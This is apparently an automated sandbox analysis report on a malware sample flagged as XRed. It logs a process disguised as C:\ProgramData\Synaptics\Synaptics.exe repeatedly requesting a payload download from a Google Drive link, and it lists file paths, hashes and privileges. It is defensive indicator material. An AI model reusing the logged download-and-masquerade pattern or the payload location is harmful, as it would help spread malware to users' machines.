                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:43 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-iaa0BI5fC9H9NWKepQX3jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      133192.168.2.550060142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:43 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:43 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-WkvpbYbabe5Ps5G_3SToug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      134192.168.2.550061142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:43 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:44 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7e7H9z2qsHgbMKGXxh38aVLreAZn8YVwa5n9_pN2ZXArwbrJGwQlsDqo77Y2P4y6iIvS8Mh1w
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:43 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-1cNiBmbkxIpOQvP7ywr-6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:44 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:44 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 35 58 71 33 42 5a 55 35 4d 78 4b 38 6b 78 31 30 76 50 70 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="r5Xq3BZU5MxK8kx10vPp1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:44 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      135192.168.2.550062142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:43 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:44 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5xC5-j_elhMB8zpAe3XmFDIMgFuZRnbbda2GYDZ9HrI1vsR8jf66Iw4j4ZgMaZyfqmf3C7_Y4
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:44 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0DaGhszLsMyqHqDNZtEhAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:44 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:44 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 34 53 42 30 59 4b 4b 6c 77 42 64 66 6d 59 64 66 64 62 69 66 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="D4SB0YKKlwBdfmYdfdbifA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:44 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      136192.168.2.550072142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:58 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:58 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6vkG_VJrNfRZUjr7WQR7Qy4Gnbey8YdNo-iPqkUwCNDfspRDEZdh7uw8k29QwfT73JLFRyGF0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:58 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-PeJbvPFtp55nRlEa-cUUdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:58 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:58 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 32 34 37 43 71 71 62 6b 6f 45 70 7a 42 71 54 70 56 5a 34 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="2247CqqbkoEpzBqTpVZ46w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:58 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      137192.168.2.550067142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:58 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:58 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2jcb9xyCCqiyXPi17AqkiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      138192.168.2.550066142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:58 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:58 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-oAqwIHIuIcSP9TKS6tsTgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:05:22:55
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\Desktop\222.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\222.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:1'723'904 bytes
                                                                                                                                      MD5 hash:71386F37F17778126296CA734975DB6D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:05:22:55
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\Desktop\._cache_222.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\._cache_222.exe"
                                                                                                                                      Imagebase:0x760000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
